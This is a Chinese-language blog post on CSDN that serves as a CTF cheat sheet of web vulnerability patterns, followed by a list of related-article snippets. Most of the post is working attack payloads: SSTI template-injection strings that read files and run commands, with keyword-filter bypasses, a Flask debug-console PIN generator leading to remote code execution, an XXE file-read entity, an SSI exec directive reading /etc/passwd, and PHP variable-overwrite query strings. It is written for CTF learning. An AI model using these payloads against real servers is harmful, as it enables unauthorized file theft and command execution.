CTF 一些漏洞模式

最新推荐文章于 2024-06-05 09:43:40 发布
最新推荐文章于 2024-06-05 09:43:40 发布
阅读量852 收藏 3
点赞数 1
分类专栏: ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41996851/article/details/116603329
版权

SSTI模板注入

SSTI初探
SSTI
SSTI详解
Smarty SSTI

常用payload;

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

或者直接
{system("cat /flag")}

还有很多常用的payload,比如:

读源码
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}{% for c in [].__class__.__base__.__subclasses__() %}#从文件中遍历
	{% if c.__name__=='catch_warnings' %}#找到开启debug模式的文件
		{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}#读取文件
	{% endif %}
{% endfor %}

查看目录
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
#这里是因为题目中过滤了import、os等关键字

获取文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}{% for c in [].__class__.__base__.__subclasses__() %}
	{% if c.__name__=='catch_warnings' %}
		{{c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}
	{% endif %}
{% endfor %}

而对于这类题目如果开启了debug模式,还有另一种解法,即使用pin登陆python shell执行命令;
PIN码RCE:

输入PIN码进行认证后,可以在交互式Python shell中执行自定义Python代码

生成PIN的关键值有如下几个

  • 服务器运行flask所登录的用户名。 通过读取/etc/passwd获得
  • modname 一般不变就是flask.app
  • getattr(app, “name”, app.class.name)。python该值一般为Flask,值一般不变
  • flask库下app.py的绝对路径。通过报错信息就会泄露该值。题中为/usr/local/lib/python3.7/site-packages/flask/app.py
  • 当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address获得16进制的值 (eth0为当前使用的网卡)
  • 机器的id。
    对于非docker机每一个机器都会有自已唯一的id,Linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。
    对于docker机则读取/proc/self/cgroup

在/etc/passwd获取用户名信息

{{lipsum.__globals__.__builtins__.open('/etc/passwd','r').read()}}
或者:
{{x.__init__.__globals__.__builtins__.open('/etc/passwd','r').read()}}

发现用户名是flaskweb

获取mac地址

{{x.__init__.__globals__.__builtins__.open('/sys/class/net/eth0/address','r').read()}}

转为10进制值:

>>> print(int('0242ac10add8',16))
2485377860642

获取机器id,读取/proc/self/cgroup

{{x.__init__.__globals__.__builtins__.open('/proc/self/cgroup','r').read()}}

就是在docker后面那一串值:e6b3bfda18c546b246b228951cdcdbcdb408d3b0fee5f7c0e187c876f532b330

收集完信息就可以计算PIN码了:

import hashlib
from itertools import chain

probably_public_bits = [
    'flaskweb',#服务器运行flask所登录的用户名
    'flask.app',# modname
    'Flask',#getattr(app, "\_\_name__", app.\_\_class__.\_\_name__)
    '/usr/local/lib/python3.7/site-packages/flask/app.py',#flask库下app.py的绝对路径
]

private_bits = [
    '2485377860642',#当前网络的mac地址的十进制数
    'e6b3bfda18c546b246b228951cdcdbcdb408d3b0fee5f7c0e187c876f532b330'#机器的id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)

输入PIN码即可进入

执行代码:

>>> import os
>>> os.popen('ls /').read()
>>> os.popen('cat /this_is_the_flag.txt').read()

引用:[GYCTF2020]FlaskApp

XXE

xxe攻击,就是利用xml引用外部实体发起攻击,可以获取文件甚至执行命令;
payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY person SYSTEM "file:///flag" >
]>
<something>&person;</something>
这里的something是自己结合题目可以用到的回显,就可以把结果展示出来

相关参考:
xxe
xxe
XXE详细讲解

SSI

SSI漏洞
SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。
例如,您可以将指令放置到现有的HTML页面中,例如:

<!--#echo var="DATE_LOCAL" -->

并且,当该页面被投放时,该片段将被评估并替换为其值:

Tuesday, 15-Jan-2013 19:28:54 EST

所以可以在shtml中放入命令
如:

<!--#exec cmd="cat /etc/passwd" -->

然后访问,进而执行命令。

变量覆盖漏洞

include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
    $$x = $y;//把参数表定义为变量,此处就可以考虑变量覆盖,比如传handsome=flag
}
foreach($_GET as $x => $y){
    $$x = $$y;//同上,但是会变成 $handsome = $flag
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;

三个if有三种payload;

  1. ?a=flag&flag=a&handsome=flag
    -当循环运行到a=flag会发现符合条件(a===a && a!=flag)
  2. ?yds=flag
  3. ?is=flag&flag=flag

变量覆盖漏洞

周粥粥啊
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf中linux内核态的漏洞挖掘与利用系列1
ALLEN'Blog
12-14 277
linux内核最初采用的是宏内核架构,其基本特性就是内核的所有操作集中于一个可执行文件中,这样的好处是模块间不需要通信可以直接调用,有效的提高了内核的运行速度,但是缺点是缺乏可扩展性。用户执行的操作其实是带有用户身份信息的进程执行的操作。命令来进行编译,当然这只是默认的编译选项,针linux内核的编译非常多的选择,有兴趣的同学可以参考Linux Insides这本书(机制中的主、客体关系,主体提供自己权限的证书,客体提供访问自己所需权限的证书,根据主客体提供的证书及操作做安全性检查,其中。
漏洞扫描 CTF
m0_68249386的博客
04-29 430
目录 文章目录目录一、基础知识1.CTF简介2.竞赛模式3.比赛形式4.题目类型二、web 信息泄露1.目录遍历2.PHPINFO3.备份文件下载3.1 网站源码3.2 bak文件3.3 vim缓存3.4 .DS_Store 一、基础知识 1.CTF简介 步骤 1.登录CTFHub—>技能树---->基础知识 2.CTF简介---->开启题目---->题目附件---->复制FLAG粘贴---->提交 2.竞赛模式 步骤 1.竞赛模式---->开启题目---
文件读取技巧
最新发布
qq_43355651的博客
06-05 458
CTF(Capture The Flag)比赛中,PHP文件读取是一种常见的挑战类型,通常涉及利用PHP中的文件包含功能或者一些不安全的文件操作来读取服务器上的敏感文件。这些敏感文件可能包含源代码、配置文件、密码甚至是FLAG(比赛的答案)。在进行这些操作时,请确保你是在合法的环境中进行,例如CTF比赛、渗透测试或者自己搭建的实验环境。未经授权尝试读取他人服务器上的文件是非法的。
浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1296
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2224
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub 中web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.
一天一道ctf 第29天
scrawman的博客
07-11 119
鸽了好久 [BJDCTF2020]Cookie is so stable
CTF100题.docx
05-25
在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出...
CTF AWD工具
10-07
CTF比赛中,POC-T可以帮助参赛者快速验证已知的攻击手段,同时也可以用于安全研究,以发现新的漏洞利用方式。 "AntSword-v1.2.0-win32-ia32" 是中国蚁剑的Windows 32位版本,它是一款远程管理工具,支持多种Web...
CTFWriteUp:一些CTF花絮
05-09
这个名为"CTFWriteUp:一些CTF花絮"的压缩包文件可能是某位参赛者或团队对过去CTF比赛的记录和总结,可能包含了他们在比赛中遇到的各种挑战、解题技巧以及使用的技术。 提到的标签"Ruby"暗示了在这个CTFWriteUp中,...
*CTF 2023 Misc
07-30
在解决这类问题时,以下是一些通用的CTF技巧和知识点: **密码学基础:** - 对称加密(如DES、AES) - 非对称加密(如RSA、ECC) - 哈希函数(如MD5、SHA-1、SHA-256) - 密码分析方法,如频率分析、生日攻击、蛮力...
CTF顶级工具与资源
04-16
- **特点**:支持在线和离线模式,灵活度高。 - **用途**:适合于快速搭建小型CTF比赛。 #### picoCTF - **简介**:picoCTF 是一个面向青少年的CTF比赛平台,旨在普及网络安全知识。 - **特点**:题目设计简单有趣...
CTF---Web---文件包含---01
qq_22160557的博客
07-28 936
文章目录前言一、题目描述二、解题步骤1.查看源代码2.文件包含(/etc/passwd)3.解码总结 前言 题目分类: CTF—Web—文件包含 一、题目描述 题目:提示寻找passwd文件 二、解题步骤 1.查看源代码 提示所有图片存储路径是download.php?name=img, 此时name参数的存在就提示此题可能为“文件包含”。 2.文件包含(/etc/passwd) 两种查看方式: 2.1、访问view-source:http://192.168.87.180/download.php
从0到1 CTFer成功之路》任意文件读取漏洞---学习笔记
aweiname2008的博客
08-08 4998
1.3 任意文件读取漏洞 所谓文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。从整个攻击过程来看,它常常作为资产信息搜集的一种强力的补充手段,服务器的各种配置文件、文件形式存储的密钥、服务器信息(包括正在执行的进程信息)、历史命令、网络信息、应用源码及二进制程序都在这个漏洞触发点被攻击者窥探。 文件读取漏洞常常意味着被攻击者的服务器即将被攻击者彻底控制。当然,如果服务器严格按照标准的安全规范进行部署,即使应用中存在可利用的文件读取漏洞,攻击者也很难拿到有价值的信息。文件读取漏洞
Linux pip3 rce复现
weixin_50618290的博客
10-26 1288
Linux pip rce
CTF练习:HTTP服务之暴力破解
qq_43233085的博客
12-01 2454
CTF练习:HTTP服务之暴力破解环境准备信息收集暴力破解 靶机地址: 链接: https://pan.baidu.com/s/1VODQKtxUrtLp8fl-v2x-bQ 提取码: og4g 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为192.168.137.176 查看靶机的IP,为192.168.137.176 ...
CTF—基于BinWalk实现文件提取
weixin_52620919的博客
07-27 6038
预备知识 BinWalk BinWalk是一款固件分析工具,旨在协助研究人员对固件进行分析、提取及逆向工程之用。BinWalk简单易用,支持自动化脚本、自定义签名、提取规则和插件模块。BinWalk的使用方法十分简单,提供待分析的文件路径即可。 【BinWalk】常用于识别任意二进制数据块中所包含的指定类型的文件数据。 AES算法 AES(高级加密标准)是一个对称分组密码算法,旨在取代DES(数据加密标准)成为广泛使用的标准,其加密过程比较复杂,分为字节代替、行移位、列混淆、轮密钥加四个步骤,具体的实现过
Linux /etc/passwd
热门推荐
小楼一夜听春雨,深巷明朝卖杏花
12-26 4万+
用户管理有两个最重要的配置文件,一个是保存用户信息的文件/etc/passwd,一个是保存了用户密码的文件/etc/shadow。 用户管理有两个最重要的配置文件,一个是保存用户信息的文件/etc/passwd,一个是保存了用户密码的文件/etc/shadow。 超级用户的uid为0,在/etc/passwd里面有很多伪用户,这些用户是不能登入的,他们的uid在1-499之间,安装完系...
CTF夺旗训练课程
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
CTF线下赛AWD总结
YICONGITSME的博客
09-20 3万+
AWD     记录一下自己最近参加的线下攻防比赛,没时间学习了,就准备了几天,果然不出意外的被安全专业的大佬打得很惨。 缺点是不会攻击,我和我队友两个人就只有防,AWD防了400分,综合渗透拿了200分。 感觉自己的知识欠差很多,代码审计能力弱,写脚本能力弱,sql注入我一直学不会。最重要的是比赛前没有真正练习过,所以比赛时才没把技能发挥出来。谨记:多实践,学好代码审计,sql注入...
网络安全夺旗赛:CTF竞赛模式详解与入门指南
在解题模式中,参赛者通过解决涵盖逆向工程、漏洞挖掘与利用、Web渗透、密码学、取证分析、隐写术和安全编程等各种技术挑战,以解决题目获得分数。攻防模式则更注重实战演练,参赛队伍在网络环境中相互攻击与防守,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值